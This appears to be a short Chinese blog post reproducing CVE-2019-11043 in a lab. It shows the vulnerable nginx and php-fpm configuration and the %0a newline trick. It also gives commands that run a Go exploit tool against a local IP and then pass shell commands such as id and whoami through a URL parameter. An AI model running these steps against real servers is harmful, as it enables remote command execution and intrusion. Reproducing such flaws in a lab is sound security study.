php已复现漏洞

CVE-2019-11043

特定配置的nginx+php-fpm的服务器会存在漏洞

如下配置:

location ~ [^/]\.php(/|$) {
  ...
  fastcgi_split_path_info ^(.+?\.php)(/.*)$;
  fastcgi_param PATH_INFO $fastcgi_path_info;
  fastcgi_pass   php:9000;
  ...
  }

可以使用换行符(%0a)来破坏fastcgi_split_path_info指令中的Regexp, Regexp被损坏导致PATH_INFO为空,从而触发该漏洞

source /etc/profile

go run . “http://192.168.64.142:8080/index.php”

多次访问http://192.168.64.142:8080/index.php?a=id

因为php-fpm会启动多个子进程,在访问/index.php?a=id时需要多访问几次,以访问到被污染的进程

http://192.168.64.142:8080/index.php?a=whoami

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值